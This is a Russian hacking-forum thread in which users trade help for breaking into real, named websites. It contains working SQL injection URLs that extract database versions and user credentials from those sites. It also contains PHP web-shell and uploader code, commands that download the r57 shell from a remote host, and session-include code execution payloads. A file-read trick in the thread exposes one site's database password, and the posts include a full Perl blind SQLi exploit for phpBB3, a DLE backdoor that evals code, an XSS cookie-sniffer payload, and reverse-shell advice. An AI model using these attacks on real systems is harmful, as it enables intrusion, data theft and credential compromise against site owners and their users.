Помогите будьласка! Есть шелл . Через шелл доступ к жесткому диску виддаленного компа (сервера) в частности диску С:\. В шели есть возможность выполнения консольных команд(шелл WSO 2.3, ОС Виндовс). Залил неткат . Могу создать отдаленого юзера . Как мне пидконектитись к тому компа если там ип 192.168.2.1 ??

Что значит залитие аплоадера файлов?
Через /proc/self/environ можно залить шелл. Читай, например, здесь (http://ahacc.ru/forum/showthread.php?t=27).
Мне кажется Матня имел ввиду просто аплоадер файлов
<form enctype=multipart/form-data method=post>
<input name=x type=file><input type=submit></form>
<?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>
Ну а код, который этот аплоадер создает:
<?php $f = fopen('up.php','w');fwrite($f,'<form enctype=multipart/form-data method=post><input name=x type=file><input type=submit></form><?php isset($_FILES[x])?(is_uploaded_file($_FILES[x][tmp_name])?(@copy($_FILES[x][tmp_name],$_FILES[x][name])):0):0; ?>');fclose($f); ?>

Помогите будьласка! Есть шелл . Через шелл доступ к жесткому диску виддаленного компа (сервера) в частности диску С:\. В шели есть возможность выполнения консольных команд(шелл WSO 2.3, ОС Виндовс). Залил неткат . Могу создать отдаленого юзера . Как мне пидконектитись к тому компа если там ип 192.168.2.1 ??
http://forum.antichat.ru/showthread.php?t=107655

http://www.jetset.com.ua/rus/magazine/search/
в поле "Что искать" вводим ' и эррор. Это просто эррор или скуля? нет возможности проверить точно, поэтому прошу глянуть.

в поле "Что искать" вводим ' и эррор. Это просто эррор или скуля? нет возможности проверить точно, поэтому прошу глянуть.

Да, скуля, в строку поиска вводим:

%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1

Получаем:

MySQL Error: 1060 (Duplicate column name '5.0.51a')

2 $n@ke
xek%')/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b#
Duplicate column name 'CHARACTER_SETS'

Залили шелл c eval($_GET['b']); Что дальше ?:(

Залили шелл c eval($_GET['b']); Что дальше ?:(
видно из веба? залил в файл с каким расширением? добавил "<?php ?>" к коду?

видно из веба? залил в файл с каким расширением? добавил "<?php ?>" к коду?
из веба видно
.php
добавил. не знаю как залить полноценный шелл

теперь обратись к скрипту site/file.php?b=ls
если выведет список директорий. то воспользуйся одним из следующих способов скачивания файла с помощью командной строки.

lynx -source "http://www.evilc0der.com/r57.txt" > ./r57.php
links -source "http://www.evilc0der.com/r57.txt" > ./r57.php
wget -O ./r57.php http://www.evilc0der.com/r57.txt
GET http://www.evilc0der.com/r57.txt > ./r57.php
fetch -o ./r57.php http://www.evilc0der.com/r57.txt
curl --output perl http://www.evilc0der.com/r57.txt

Залили шелл c eval($_GET['b']); Что дальше ?:(
теперь обратись к скрипту site/file.php?b=ls

AFoST не торопись :)
DeluxeS почитай что-нибудь, зачем тебе шелл. если ты не знаешь что делать?

AFoST не торопись :)
DeluxeS почитай что-нибудь, зачем тебе шелл. если ты не знаешь что делать?
Заменил eval на system, всё ок

AFoST не торопись :)
DeluxeS почитай что-нибудь, зачем тебе шелл. если ты не знаешь что делать?
как обычно, суета =\
ты прав, поправляюсь)
site/file.php?b=phpinfo();
должно вылезти сопсно оно)
а залить так
создаешь форму
<form action="site/file.php?b=copy($_FILES[file][tmp_name], $_GET[aa]);&aa=/path/file.php" method="post" enctype="multipart/form-data">
<input type="file" name="file"><br>
<input type="submit" value="Загрузить"><br>
</form>
открываешь выбираешь файл и жмёшь отправить

если на запрос .php?pageNum_Year=-2007/**/union/**/select/**/version(),2/*
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
КАК правильно составит запрос

если на запрос .php?pageNum_Year=-2007/**/union/**/select/**/version(),2/*

КАК правильно составит запрос
Если вместо версии ставить циферку, то ошибки нету?
Если нету, и циферка выводится, значит кодируй данные. HEX или Char

Последнее время это самый популярный вопрос в теме))
unhex(hex(version()))

спс за ответ решил с помошью CONVERT(user() USING latin1)
блин дурак сам не догодался

Не выходит заюзать sipt4 для слепой скули.
Загружаю таблицы,перехожу на вкладку брутфорс.Туды фигачу:
SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+L IMIT+{N1-100},1
url http://betonex.com.ua/?l=1

после прохода по Auto Determine пишет:
Autodetermine failed

http://betonex.com.ua/?l=2%20and%20substring(@@version,1,1)=4

Прошу помочь :confused:

Помочь-то с чем? С сиптом? Со скулей?

@@tmpdir: /tmp
@@basedir: /usr/
version(): 5.1.36
database(): betonex_com_ua
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu

Помочь-то с чем? С сиптом? Со скулей?

@@tmpdir: /tmp
@@basedir: /usr/
version(): 5.1.36
database(): betonex_com_ua
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu



Спасибо.
Мне бы ещё с сиптом помогли.
Не могу понять как правильно указывать параметры в BruteForce Attacking
Нужно получить таблицы,в ручную долговато будет :(

Как получить переменную сессии в livejournal.com? через document.cookie не выходит

проблема с софтом для дампа бд. Раньше юзал simple SQLi Dumper и SQL helper, но в последнее время софтины начали работать очень не стабильно, к тому же пропускают некоторые записи в базах.

Подскажите альтернативы.

2 jecka3000
sypex,mysqladmin.

проблема с софтом для дампа бд. Раньше юзал simple SQLi Dumper и SQL helper, но в последнее время софтины начали работать очень не стабильно, к тому же пропускают некоторые записи в базах.

Подскажите альтернативы.

Работал с Mysql Front нормальная прога работает стабильно
Посмотри ТУТ (http://www.soft.join.com.ua/1623.html)

$n@ke,Bramin спасибо,но это официальные проги. Для них нужно имя БД и пароль, а в моем случае, у меня есть только уязвимый линк и раскрученная скуль инъекция, именно поэтому я прибегл к помощи таких программ как SQL Helper & SSiD, если есть их аналоги в работет через уязвимый параметр, то именно они мне и подходят!

jecka3000, тогда попробуйте эти
https://forum.antichat.ru/showpost.php?p=236188&postcount=3
https://forum.antichat.ru/thread158100-toolza.html

вопрос есть сайт http://forapro.ru/myadmin/

чем брутить?

Brutus AET2

а такой вопрос что в хосте вставлять?
это "http://forapro.ru/myadmin/"и все? тип запроса http ?

вопрос есть сайт http://forapro.ru/myadmin/

чем брутить?
Кеп намекает

http://forapro.ru/?page_id=11%27

Не тестил :(

Mohze

пасип...

я думал,что http://forapro.ru/myadmin/ проще.

ибо с sql-inj полный нолик))

просканировал директории сайта, все "админские " поддомены типа phpmyadmin.sait.ru;admin.sait.ru;cp.admin.ru ,а также все остальные пути типа sait.ru/admin;sait.ru/cpanel ну и т.д. выдают один и тот же резуотат:
Great Success !
Apache is working on your cPanel® and WHM™ Server

If you can see this page, then the people who manage this server have installed cPanel and WebHost Manager (WHM) which use the Apache Web server software and the Apache Interface to OpenSSL (mod_ssl) successfully. They now have to add content to this directory and replace this placeholder page, or else point the server at their real content.

Что с этим апачем делать?

просканировал директории сайта, все "админские " поддомены типа phpmyadmin.sait.ru;admin.sait.ru;cp.admin.ru ,а также все остальные пути типа sait.ru/admin;sait.ru/cpanel ну и т.д. выдают один и тот же резуотат:
Great Success !
Apache is working on your cPanel® and WHM™ Server

If you can see this page, then the people who manage this server have installed cPanel and WebHost Manager (WHM) which use the Apache Web server software and the Apache Interface to OpenSSL (mod_ssl) successfully. They now have to add content to this directory and replace this placeholder page, or else point the server at their real content.

Что с этим апачем делать?
Скорее всего это реакция апача на несуществующую папку,или же апач только установили и он больше пока ничего не умеет.Кагбе дефаулт-паге показывает.

просканировал директории сайта, все "админские " поддомены типа phpmyadmin.sait.ru;admin.sait.ru;cp.admin.ru ,а также все остальные пути типа sait.ru/admin;sait.ru/cpanel ну и т.д. выдают один и тот же резуотат:
Great Success !
Apache is working on your cPanel® and WHM™ Server

If you can see this page, then the people who manage this server have installed cPanel and WebHost Manager (WHM) which use the Apache Web server software and the Apache Interface to OpenSSL (mod_ssl) successfully. They now have to add content to this directory and replace this placeholder page, or else point the server at their real content.

Что с этим апачем делать?
Боюсь что даже запрос вида:
hf21y572jakdjasd84128142148uafduuasfuafa.sait.ru - выдаст тот же самый Соксесс)

странно, что сканер тогда выдал директории эти. В этом случае админку нереально найти?
П.С. На самом сайте формочек входа нет(

странно, что сканер тогда выдал директории эти. В этом случае админку нереально найти?
П.С. На самом сайте формочек входа нет(
Сканер будет себя вести не совсем адекватно,ибо его то туда пускает - вот он тебе и выдает что директория/субдомен существует.
Надо добавить в файл Ерорс уникальных слов с страницы апача,и тогда эти странички будет отфильтровывать как несуществующие ;)

Если речь идет конечно не о секурти дигер )

Подрубил шелл через инклуд(имя файла генерится в виде хэша).Всё нормально,вот только по шеллу не побегаешь - не даёт исполнять команды.Приходится заливать каждый раз рнр скрипт с system() (не особо-то и важно) функцией для исполнения коанд.Выходит,что чтобы пробежаться по всем дирам ,нужно залить скрипт столько раз,сколько и директорий на сервере(или же заюзать рекурсивные запросы).Возможно ли избежать этого ? И,соответственно,как это осуществить ? Я уже не говорю об использовании полноценных шеллов - хотя бы исполнение команд через суперглобальные переменные,а то конкретно задолбало...
Забыл также упомянуть,что просто залить .php скрипт не получится - код просто выводится,вследствие чего можно заключить,что рнр код шелла не исполняется(оно и логично)... в директории,куда заливаю шелл.Написал я это потому,что иногда прокатывает - нашёл форму аплоада,а там бац - и всё.Можно лить...)

Также интересует,как залить шелл с помощью метода инклуда сессий,описанного здесь:

_http://ahacc.ru/forum/showthread.php?t=27


"Подменив эти данные на нужный php-код и заинклудив сессию, мы поимеем шелл." - Каким образом подменить и ГДЕ ? Единственное,что приходит на ум - Отправка заголовка COOKIE: PHPSESSID=<?evilcode?> в НТТР запросе.Но ведь не засунешь же туда весь код шелла ?
Как результат должен проинклудиться шелл,я так понял.

Каким образом подменить и ГДЕНужно подменить какую-нибудь переменную, которая записывается в сессию. Например, в некоторых движках при авторизации имя пользователя сохраняется в сессию. Таким образом, если есть возможность, мы можем вписать в имя пользователя php-код, который в свою очередь запишется в сессию. Остаётся только проинклудить её.

Также интересует,как залить шелл с помощью метода инклуда сессий,описанного здесь:

_http://ahacc.ru/forum/showthread.php?t=27


"Подменив эти данные на нужный php-код и заинклудив сессию, мы поимеем шелл." - Каким образом подменить и ГДЕ ? Единственное,что приходит на ум - Отправка заголовка COOKIE: PHPSESSID=<?evilcode?> в НТТР запросе.Но ведь не засунешь же туда весь код шелла ?
Как результат должен проинклудиться шелл,я так понял.

смотри допустим найшол ты уязвимый параметр:
page=
пишеш
page=../../../../../../etc/passwd%00<? system($_GET['cmd']); ?>
а потом просто подцепляеш из tmp co своей sess_
ну типо так к примеру:)
page=../../../../../../tmp/sess_23h4g23jh45g245v4jh%00&cmd=id

2 547:

мда...с логами не попутал? Причем здесь сессия и твой первый запрос

page=../../../../../../etc/passwd%00<? system($_GET['cmd']); ?>

????

Объясни связь ламеру

Толку инклудить сессию,сначала надо в неё код что бы записался.

ну поздравляю с просветлением тебя :)

m0Hze
удивляюсь што ты про такое незнал...
ну как это причем...
именно через подключение твоей сессии которая лежит в тмп выполняеется код шелла:)
page=../../../../../../etc/passwd%00<? system($_GET['cmd']); ?>
Что ты хотел этм сказать? Каким образом строка из гет,попадет в сессию? Причом тут инклуд вообще,если ты хочеш просто вписат ьв сессию данные.Ты либо путаеш логи апача с сессиями,либо я вообще ниразу не знаю php :/

т.е. если я правильно понял, то просто набрав в урле-жертвы php-код и проинклудив сессию из /tmp можно получить шелл? Спасибо, революционный способ детектед Чел просто слышал звон но не знет где он.

Если параметр page пишется в сессию, то достаточно вот этого:
page=<? eval($_REQUEST['cmd']); ?>
Ну и потом инклудить сессию. А лабуда с etc/passwd тут вообще не при чём.

Qwazar

Если параметр page пишется в сессию

а если не пишется (чото даже ни разу такого не встречал), то вот это почитайте к примеру:

https://forum.antichat.ru/thread119481.html

т.е. как бы для начала надо посмотреть, что вообще пишется в сессию, для начала, как у гостя, так и после регистрации (если есть регистрация)

иногда в сессию пишется поледний посещенный юрл, но это очень редко

конструкция с /etc/passw%00< system($_GET['cmd']); ?>
тоже катит!!! Тоже катит, разумеется, но /etc/passw%00 - тут просто лишний текст в нагрузку. Для инклуда, он не является ни необходимым ни хоть сколько нибудь полезным. а если не пишется (чото даже ни разу такого не встречал) Встречал случаи, когда в сессию пишется туча разного бреда, в том числе и некоторые входящие параметры. И при этом не заинклудить ни логи, ни что либо ещё, кроме сессии и файлов движка.

ну да для начала именно это и следует выяснить што там в куки пишется:)

в куках может быть только идентификатор сессии и всё, но мыло и другие данные, введенные при регистрации, например, могут быть отображены в сессии при её инклуде

Подкажите плиз. как получить все колнки или столбцы если group_concat() не всё выводит

http://www.gexecutives.com
/job.php?ID=-208+union+select+1,2,3,4,5,6,7,8,group_concat%28co lumn_name%29,10,11,12,13,14,15,16,17,18+from+infor mation_schema.columns--

вообщем наконец все поняли што я вас необманую...
да /etc/passwd необязательная конструкция...
но она проходит..
писал просто для наглядности...

вообщем наконец все поняли што я вас необманую...
да /etc/passwd необязательная конструкция...
но она проходит..

практически никогда, в 1 случае из 1000 может быть, так что польза от такой инфо стремится к нулю

практически никогда, в 1 случае из 1000 может быть, так что польза от такой инфо стремится к нулю
тыже толькошто писал што никогда неслышал про такую уязвимость:)
а тут уже пишеш как будто ты ее 1000 раз юзал:)
штото тут попахивает.....

вообщем наконец все поняли што я вас необманую...
да /etc/passwd необязательная конструкция...
но она проходит..
писал просто для наглядности... Для наглядности чего? Объясни плз в каком случае нужно использовать именно твой вариант, при инклуде из сессии.

Т.е. когда нужни использовать:
?page=/etc/passw%00< system($_GET['cmd']); ?>
и невозможно использовать просто вот это:
?page=< system($_GET['cmd']); ?>

Подкажите плиз. как получить все колнки или столбцы если group_concat() не всё выводит
Юзай LIMIT

Подкажите плиз. как получить все колнки или столбцы если group_concat() не всё выводит

http://www.gexecutives.com
/job.php?ID=-208+union+select+1,2,3,4,5,6,7,8,group_concat(colu mn_name),10,11,12,13,14,15,16,17,18+from+infor mation_schema.columns+and+column_name>'some_column'--

Всем привет. Я xss недавно начал изучать. Подскажите <script>alert()</script> я вбиваю вообще в любое поле на сайте? Так?

Всем привет. Я xss недавно начал изучать. Подскажите <script>alert()</script> я вбиваю вообще в любое поле на сайте? Так?
Универсальнее "><script>alert()</script> или '><script>alert()</script>
Что бы в случае чего,закрыть предидущий тег.В любом случае,лишним не будет,но может помочь.

http://hotel.1000turov.ru/hoteld2.php?id=1294367249+order+by+1--
начинаю применять union+select и результатов нет, в чем проблема?

http://hotel.1000turov.ru/hoteld2.php?id=1294367249+order+by+1--
начинаю применять union+select и результатов нет, в чем проблема?
Подзапросы?

http://hotel.1000turov.ru/hoteld2.php?id=../../../../../../../../home/chobot/hotel.1000turov.ru/www/hoteld2.php

Спасибо всем за подробные ответы,но есть ещё одна идейка.Используя вышеприведённые методы,нужно знать,значения каких переменных записывается в сессию...а двиг самописный.
Возникла идея скопировать код загружаемого скрипта в директорию,доступную для записи.Подозрения на невыполнение кода именно в директории загруженных файлов.Поскольку скрипты выполняются,можно попробовать последовательность команд,но не уверен...


P.S.: Файлы сессий 100% инклудятся и хранятся в /tmp (вчера проверял).Буду искать переменные сессий,поскольку двиг мне неизвестен.

m0Hze, а какие именно? Можешь привести примеры?)
Pashkela, спб, но если честно, я не понял что дает твой линк :(

m0Hze, а какие именно? Можешь привести примеры?)
Pashkela, спб, но если честно, я не понял что дает твой линк :(

гораздо круче обычной скули, обычная читалка, но последствия ужасные для админа могут быть:


http://hotel.1000turov.ru/hoteld2.php?id=../../../../../../../../home/chobot/1000turov.ru/www/inc/my.php

смотрим сорцы, а там:

<?php
$connection = mysql_connect("localhost", "ayen", "chobot");
mysql_select_db("chobot", $connection);
?>


ну и осталось только phpmyadmin найти, что тоже оказалось легко:


http://hotel.1000turov.ru/myadmin/


дел ровно на 1 минуту. Привелегии не проверял (но новую БД почему-то можно создавать, гы)

Как ни странно,мой способ сработал))).Теперь смогу попробовать ваши(исходники теперь будут).Выражаю огромною благодарность ).

мм,а если админка расположена за пределами docroot,то как к ней тогда вообще доступ получить ?

включить хек-догадку на 45%

Если у тебя есть инклуд - причем здесь админка? А вообще задавай вопросы конкретно, сам перечитай, что пишешь - с ума можно сойти, пока вгонишь, о чем вообще речь, предлагаешь всем мотать по три страницы назад? "Свой метод прокатил" - ты о чем вообще? Язык борется за независимость от мозгов?

включить хек-догадку на 45%

"Свой метод прокатил" - ты о чем







Возникла идея скопировать код загружаемого скрипта в директорию,доступную для записи.



Не понимаю,чего ты не понял.По-моему,я ясно дал понять,что решил проблему.

НОВЫЙ АБЗАЦ - НОВАЯ МЫСЛЬ

Когда я лазил по серваку с шелла,то нашёл админку за пределами docroot.Да,у меня есть инклуд,но меня интересует,как ею вообще люди пользуются.

P.S.: Можно было ответить и в более вежливой форме.

Когда я лазил по серваку с шелла

ну раз шелл уже есть, причем здесь уже какая-то админка?

PS: Могли поставить символическую ссылку, как это часто делают с phpmyadmin

ну раз шелл уже есть, причем здесь уже какая-то админка?


Ну и что ? Хочется мне так )))).Так и ответь,что невозможно.

2 GenTao:

появляется ощущение, что ты с зеркалом разговариваешь:

http://jack.kiev.ua/docs/slackbook/filesystem-structure-links.html

Ну и что ? Хочется мне так )))).Так и ответь,что невозможно.
Здесь нету телепатов, возможно лежит вообще на поддомене.

Здесь нету телепатов, возможно лежит вообще на поддомене.

папка admin лежит на директорию выше директории сайта.А поддоменов,кстати,там 20+ ))
В общем,не получится там я так понял,даже если инклудом достану).

после того, как мне Пашкела показал метод "читалок" (http://moysait/hotd2.php?id=../../../../../../../../home/chobot/moysait/www/inc/my.php) стало интересно разобраться в самой сути, а также появилось несколько вопросов (Pashkela, если ты в лс не отвечаешь, мож тут хоть ответишь))
1.Есть ли специальный софт для составления запросов "читалок"?
2. Как определить, когда можно составить такой запрос, а когда нет?
3. И собственно говоря, какой принцип составления такого запроса?
Для ответа на все эти вопросы нужно понимать общий принцип работы скрипта. Какие переменные как формируются, куда и как подставлятся, примерные фильтры итд. Для этого нужно смотреть и анализировать коды. Разберёшься в этом - будет тебе счастье. Не разберёшься - можешь забить и искать "специальные программы" аля хакер интернета.

есть у меня щелл есть папки..например тест и в папке есть index.php admin.php config.php зна4eт 4то ето база сайта..а а каk знат домен ??

есть у меня щелл есть папки..например тест и в папке есть index.php admin.php config.php зна4eт 4то ето база сайта..а а каk знат домен ??
Тут много вариантов. Какие юзаю я:
1) тайтл
2) коннект к БД
3) Внедрение кода

Первый способ: смотришь index.php ищещь <title>asdf9a</title>
Вбиваешь asdf9a в google.com - первые 1-5 результатов попадается тот самый домен

Второй способ: ищещь config.php или подобные(conf, cnf,хз как их ещё можно назвать) ,
Там есть строчки
mysql_password
mysql_login
и куда подключаться:
В шелле есть SQL:
Вводишь логин\пароль и куда подключаться( в большинстве случаеB localhost )
И ищещь в табличках meta, keywords, title:
Там по кеям или по другим признакам можно найти.

Третий способ:
(Нужны права редактирования index.* или default.* ,если нет index.* )
Втираешь туда код:

<?php
$file = 'security.txt'; //Файл, куда будем писать данные домена
$domain = $_SERVER["HTTP_HOST"];
//уточните тут: php.su/learnphp/cgi/?cgivars
//Создайте файл $file
$fp = fopen($file, "a+");
fwrite($fp, $domain."\r\n");
fclose($fp); ?>
Лучше создать файл lol.php и засунуть туда вышестоящий код.
А в индекс
<?php
...//Copyright by SMF/phpbb .../../.......
include('lol.php');
//Ниже этот код загружающий код, ничего не меняйте
Можно сделать и удалённую отправку :) Но мне хватало всегда первого способа
PS: Использовано в условиях с шеллом, где сотни сайтов, всё гуд :p

Ребята помогите плиз!Кароче у меня есть эксплоит на phpBB3 я его запуская а там где MD5 : пусто что делать? или это форум пропатчен?

Ребята помогите плиз!Кароче у меня есть эксплоит на phpBB3 я его запуская а там где MD5 : пусто что делать? или это форум пропатчен?
Сплойт выложи

#!/Perl/bin/perl
# ---------------------------------------------------------------
# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# http://bx67212.netsons.org/forum/viewforum.php?f=3
# ---------------------------------------------------------------
# Note: Works regardless PHP.ini settings!
# Thanks meh also know as cHoBi
# ---------------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($hash,$time1,$time2);

my @chars = (48..57, 97..102);
my $http = new LWP::UserAgent;

my $host = shift;
my $table = shift;
my $myid = shift or &usage;


sub injection
{
my ($sub,$char) = @_;

return "/tag_board.php?mode=controlpanel&action=delete&id=".
"1+and+(select+if((ascii(substring(user_password,${ sub},1)".
")=${char}),benchmark(230000000,char(0)),0)+from+${ table}_us".
"ers+where+user_id=${myid})--";
}


sub usage
{
print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
print STDOUT "by athos - staker[at]hotmail[dot]it\n";
exit;
}


syswrite(STDOUT,'Hash MD5: ');

for my $i(1..33)
{
for my $j(0..16)
{
$time1 = time();

$http->get($host.injection($i,$chars[$j]));

$time2 = time();

if($time2 - $time1 > 6)
{
syswrite(STDOUT,chr($chars[$j]));
$hash .= chr($chars[$j]);
last;
}

if($i == 1 && length $hash < 0)
{
syswrite(STDOUT,"Exploit Failed!\n");
exit;
}
}
}

# milw0rm.com [2008-12-08]

Так же есть ещё и на php но там я незнаю как запустить !
А на perle оно думает потом выдаёт MD5 : и все!

Есть сайт на DLE 8.2. Под эту версию двига нашёл эксплойт.

if($_GET['wert']==''){
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];
@header("HTTP/1.0 200 OK");
@header("HTTP/1.1 200 OK");
@header("Cache-Control: no-cache, must-revalidate, max-age=0");
@header("Expires: 0");
@header("Pragma: no-cache");
@header("Content-type: text/css; charset=".$config['charset']);
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);
if (!strlen($data)) echo $lang['no_update']; else echo $data;
}else{
$file=(ROOT_DIR."/engine/classes/mysql.class.php");
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/dbconfig.php");
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";}
$file=(ROOT_DIR."/engine/data/config.php");
if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";}
eval(base64_decode($_GET['user_id']));
echo <<<HTML
<HTML><body><form action="" method="post">
<center><textarea name="text" rows="10" cols="100"></textarea>
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>
HTML;
if($_POST['text']!=''){eval(stripcslashes($_POST['text']));
}}


Только вот как его применить?
Пробовал создавал форуму.

<form method=post action="http://site.ru/engine/ajax/updates.php?wert=go" >
<input type=text name=text>
<input type=submit value=Отвправить></form>

Помогите пожалуйста разобраться :(

разбирался со скриптом от Пашкелы и Электа для работы с SQLinj, возник вопросс перловским скриптом Электа:
делая запрос: c:\mysql\public> c:\mysql\public\mssql_base_dump.pl -u "http://sait.com/section?php/section_id=20 ' " -w 3
после этого у меня тупо открывается текстовый файл mssql_base_dump, может кто сталкивался с такой проблемой?

c:\mysql\public> c:\perl\bin\perl c:\mysql\public\mssql_base_dump.pl -u

http://pult.com.ua/tv.php?id=14558&world=0+and+2=1+union+select+1,2,3,4,5,6--
пробовал и с подзапросами и без...ошибка все равно остается...

пробовал и с подзапросами и без...ошибка все равно остается...

http://pult.com.ua/tv.php?id=14558&world=0+and+extractvalue(1,concat(0x5c,(select+ver sion())))--+

5.1.35-log

Из за чего возникает ошибка:
Warning: include(Array) [function.include]: failed to open stream: No such file or directory in ../../../..
Запрос:

script.php?b[]=64.txt
И как от неё избавиться?

Из за чего возникает ошибка:

Запрос:

И как от неё избавиться?


приемные данные не фильтруются. Скрипт, как я понял, передает открыть сразу массив файлов, что невозможно.

Либо просто убери ошибки, либо фильтруй. Разумеется, 2ое лучше.

Из за чего возникает ошибка:

Запрос:

И как от неё избавиться? Скрипт ждёт от тебя строку, а ты ему массив передаёшь.

Попробуй так: script.php?b=64.txt

Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)

Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
Может перед тем,как становиться крутым хакером, стоит почитать о том как работают те или иные ЯП? И вообще в целом о http и интернете.Тогда такие вопросы пропадут сами собой.

Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
php-include
При таком коде include($_GET['page']); php инклудит файл с именем page в папке со скриптом(можно выйти из границ папки напр. ?page=../../file.php). Соответственно, исполняется php-код и возвращается результат на страницу.
читалка файлов
Чтобы увидеть php-код на странице, нужно искать другие реализации кода, направленные именно на чтение файла (напр. file(), fopen+fgets, идр.) + должен быть вывод на страницу.

поищу прям ща))) и все-таки?

AFoST, спасиб)

Здраствуйте можете помочь.Как обойти фильтр на mail.ru(он вроде заменяет точку и пробел на нижнее подчёркивание)Как должна выглядить этот скрипт
%3CSCRIPT_type=text/javascript_src=http://httpz.ru/sniffer.js></SCRIPT>"

Пытался пробиндить машину,залил бинд, дал команду perl bind.pl . И ужеминут 15 никакого результата, просто грузится и все. Что с этим делать?
Linux 2.6

Пытался пробиндить машину,залил бинд, дал команду perl bind.pl . И ужеминут 15 никакого результата, просто грузится и все. Что с этим делать?
Linux 2.6

делай бэк-коннект. информация есть на форуме.

UPD:http://forum.antichat.ru/thread151993.html

пробовал, тоже самое... Только пишет Now script try connect to 1хх.хх.ххх.ххх port 32767 ... так и весит

пробовал, тоже самое... Только пишет так и весит

неткат у себя запустил?делай всё как в мануале, всё пашет(мб у тебя айпи динамический?)

:.']неткат у себя запустил?делай всё как в мануале, всё пашет(мб у тебя айпи динамический?)
Скорее NAT, а не динамик =))

:.']неткат у себя запустил?делай всё как в мануале, всё пашет(мб у тебя айпи динамический?)
неткат тоже не реагирует висит...

Скорее NAT, а не динамик =))

перепутал =(

неткат тоже не реагирует висит...

делай на дедик

:.']
делай на дедик
Всмысле через промежуточный хост?

Всмысле через промежуточный хост?

команды на шелле пашут хоть?)

:.']команды на шелле пашут хоть?)
да)

Столкнулся с такой ситуацией:
есть SQL с выводом, ветка 5, MySql пользователь рут, и главное нету волшебных ковычек, однако Load_file почему то не пашет...
Раскрытие путей нету вообще, помоему на сервере стоит запрет на вывод ошибок.
ещё есть таблица с юзверями, все поля подобрал, но как только пытаюсь вывести инфу, так ничего не выводится, хотя ясен пень, что она там есть, ибо админы и юзвери на сайте присутствуют, и при регистрации все данные так-же называются как и колонки в таблице.
пробовал всё, и unhex(hex()) и char и т.д....
Какие есть варианты? (к сожалению дать линк на SQL не могу)

Столкнулся с такой ситуацией:
есть SQL с выводом, ветка 5, MySql пользователь рут, и главное нету волшебных ковычек, однако Load_file почему то не пашет...
Раскрытие путей нету вообще, помоему на сервере стоит запрет на вывод ошибок.
ещё есть таблица с юзверями, все поля подобрал, но как только пытаюсь вывести инфу, так ничего не выводится, хотя ясен пень, что она там есть, ибо админы и юзвери на сайте присутствуют, и при регистрации все данные так-же называются как и колонки в таблице.
пробовал всё, и unhex(hex()) и char и т.д....
Какие есть варианты? (к сожалению дать линк на SQL не могу)

мб фейковая скуля? :o

http://logos.sakh.com/auth.php?name='&passw='
ваши идеи?
любой запрос игнорирует...
Мыслей нет.

http://logos.sakh.com/auth.php?name='&passw='
ваши идеи?
любой запрос игнорирует...
Мыслей нет.
эмм..а что там не так? сайт ясно говорит - что логин\пассвор инкорект.Невижу уязвимости,хоть глаз выколи.
А вот если так,то уже кое что есть,раскрытия путей.

http://logos.sakh.com/auth.php?name[]=%27&passw[]=%27

А вот и скуля

http://logos.sakh.com/?view=comments%27+union+select+version%28%29,2,3+--+


http://logos.sakh.com/?view=comments%27+union+select+COLUMN_NAME,2,3+FRO M%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAM E=%27logos_users%27%20+limit+2,1+--+


Version: 5.0.82sp1-log
Админка: Z:jncjcb
Ничего интересного :(
Даже обидно(

http://logos.sakh.com/?view=comments%27+union+select+concat_ws%280x3a,ni ck,password,email%29,2,3+FROM%20logos_users+--+

Имей лимитом,если хочеш других пльзователей.привилегий на загрузку шела нет,а жаль.Хотя из админкиможно файлы править :D но там чтото недописано,и поэтому не получаеться)

На форумах есть возможность подгружать картинку с другого сайта, можно найти скуль иньекцию
потом втулить на форуме картинку, а в src
путь со скулей вбить и с функцией benchmark(),на популярном форуме (если конечно еще на src нет фильтра никакого ручными методами, тока еще все зависит от магикс_квотс на сервере где форум стоит, как обрабатываеться bb-код...)

BENCHMARK(count,expr)
The BENCHMARK() function executes the expression expr repeatedly count times. It may be used to time how quickly MySQL processes the expression. The result value is always 0. The intended use is from within the mysql client, which reports query execution times:

При чем всегда будут ип пользователей, не твой
